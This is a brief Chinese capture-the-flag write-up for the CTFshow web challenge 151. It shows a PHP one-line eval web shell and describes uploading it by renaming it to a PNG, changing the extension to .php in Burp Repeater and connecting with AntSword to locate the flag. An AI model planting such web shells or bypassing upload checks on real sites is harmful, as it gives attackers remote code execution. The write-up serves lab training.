CTFshow WEB入门151

只能上传png图片,我们写一个一句话木马<?php @eval($_POST[‘attack‘]) ?>
重命名为1.png,bp抓包,然后上传,
ctrl+R放到repeater中,将1.png改为1.php
CTFshow WEB入门151
GO一下,发现上传成功,返回了上传路径/upload/1.php
用蚁剑连接,在/var/www/html路径发现flag.php
CTFshow WEB入门151

CTFshow WEB入门151

上一篇:UNIX - Copying a File


下一篇:Centos7安装部署WebLogic